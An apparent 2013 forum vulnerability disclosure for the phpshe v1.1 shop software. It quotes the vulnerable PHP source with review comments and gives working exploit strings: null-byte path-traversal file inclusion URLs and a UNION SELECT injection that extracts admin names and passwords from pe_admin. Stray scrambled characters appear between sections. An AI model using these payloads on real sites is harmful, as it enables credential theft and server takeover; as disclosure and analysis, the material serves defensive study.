phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体大概参数传输

// common.php: request data is imported into prefixed global variables.
// Every key of $_GET / $_POST / $_SESSION / $_COOKIE becomes a variable named
// $_g_* / $_p_* / $_s_* / $_c_* (EXTR_PREFIX_ALL), which is how later code such
// as product.php can read $_g_keyword directly. The only processing on the way
// in is pe_trim() and, when magic quotes are on, pe_stripslashes() — so any
// escaping for SQL or for file paths has to happen at the individual sink
// (NOTE(review): pe_trim() is presumably trimming only; confirm in its source).
if (get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
    }
} else {
    if (!empty($_GET)) {
        extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
    }
}

session_start();
if (!empty($_SESSION)) {
    extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
}
// Cookies are stripslashed unconditionally, unlike GET/POST above.
if (!empty($_COOKIE)) {
    extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
}
2 d! x" c$ j* s  ^2 ^; A
0x01 包含漏洞

//首页文件
<?php
// Home page: load the cached site data the templates need, compute the cart
// badge, then dispatch to the requested module.
include('common.php');

$cache_category     = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class        = cache::get('class');
$cache_ad           = cache::get('ad');
$cache_link         = cache::get('link');
$cache_page         = cache::get('page');

// Customer-service QQ numbers are stored as one comma-separated setting value
// ($cache_setting is populated outside this snippet, presumably in common.php).
$web_qq = array();
if ($cache_setting['web_qq']['setting_value']) {
    $web_qq = explode(',', $cache_setting['web_qq']['setting_value']);
}

// Cart item count: logged-in users are counted from the `cart` table, guests
// from the serialized list kept in the cart_list cookie ($_c_cart_list comes
// from $_COOKIE via the extract() in common.php).
// NOTE(review): unserialize() here runs on attacker-controlled cookie data;
// a JSON-encoded list would be the safer representation.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id'=>$_s_user_id));
} else {
    $cookieCart = unserialize($_c_cart_list);
    $cart_num = $cookieCart ? count($cookieCart) : 0;
}

// Module dispatch. $mod comes straight from the request (see the routing block
// in common.php), so this include path is user-controlled: restrict $module and
// $mod to a fixed list of known module names before building the path.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
// common.php, starting at line 15: URL routing configuration.
// Defaults first, then POST overrides GET, which overrides the default. No
// validation is applied, so $mod, $act and $id reach index.php's include and
// the module code exactly as the client sent them. $id has no default in this
// snippet — it falls back to whatever value (if any) is already set.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ?: ($_GET['mod'] ?: $mod);
$act = $_POST['act'] ?: ($_GET['act'] ?: $act);
$id  = $_POST['id']  ?: ($_GET['id']  ?: $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

0x02 搜索注入

<code id="code2">

// product.php
case 'list':
    // $id is the routed request parameter (common.php); intval() makes it safe here.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));

    // Search conditions: start with the fixed product_state filter.
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // Match the whole category subtree when category_cidarr() returns one.
        $category_cidarr = category_cidarr($category_id);
        if (is_array($category_cidarr)) {
            $sqlwhere .= " and `category_id` in('" . implode("','", $category_cidarr) . "')";
        } else {
            $sqlwhere .= " and `category_id` = '{$category_id}'";
        }
    }
    // $_g_keyword is the raw GET parameter (see common.php) and is spliced into
    // the LIKE clause without any escaping — this is the SQL injection the post
    // describes. Run it through pe_dbhold() (as order.php does for $_g_id) or,
    // better, a bound parameter.
    if ($_g_keyword) {
        $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    }
    // Sort order "<column>_<direction>" is also taken verbatim from the request;
    // both halves should be checked against a fixed list of allowed values.
    if ($_g_orderby) {
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    } else {
        $sqlwhere .= " order by `product_id` desc";
    }
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));

    // Hot-sale ranking
    $product_hotlist = product_hotlist();
    // Current category path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
// Following the call into the pe_selectall() library method.
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Build the WHERE clause. product.php passes a ready-made string here;
    // NOTE(review): _dowhere() presumably returns such a string unchanged, so no
    // escaping can happen at this layer — confirm in its definition.
    $sqlwhere = $this->_dowhere($where);
    // $field and $table are interpolated directly; dbpre is presumably the
    // table-name prefix constant.
    $sql = "select {$field} from `" . dbpre . "{$table}` {$sqlwhere}";

    return $this->sql_selectall($sql, $limit_page);
}
//exp
. C  Q9 d9 i' f1 Y4 \/ Z2 b7 _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>

0x03 包含漏洞2

<code id="code3">

// order.php
case 'pay':
    // The order number from the query string, escaped for SQL use.
    $order_id = pe_dbhold($_g_id);

    // Load the configured payment methods and decode each one's stored config.
    $cache_payway = cache::get('payway');
    foreach ($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // Collapse CR / LF / TAB in the bank-transfer text into the literal
            // two-character sequence \n (the replacement is single-quoted).
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(
                array("\r", "\n", "\t"),
                '\n',
                $cache_payway[$k]['payway_config']['bank_text']
            );
        }
    }

    // Only an order still in state 'notpay' can be paid.
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    if (!$order['order_id']) {
        pe_error('订单号错误...');
    }

    if (isset($_p_pesubmit)) {
        // NOTE(review): the whole POST "info" array is written to the order row
        // as submitted; the set of updatable columns should be whitelisted here.
        $payUpdated = $db->pe_update('order', array('order_id'=>$order_id), $_p_info);
        if (!$payUpdated) {
            pe_error('支付错误...');
        } else {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $_p_info['order_payway'] is user-supplied and becomes a path segment
            // of this include — the second inclusion issue in the post. Check it
            // against the keys of $cache_payway (the configured payment methods)
            // before building the path.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }
    }

    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>4 J% B* s! X6 X9 z# q0 u
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
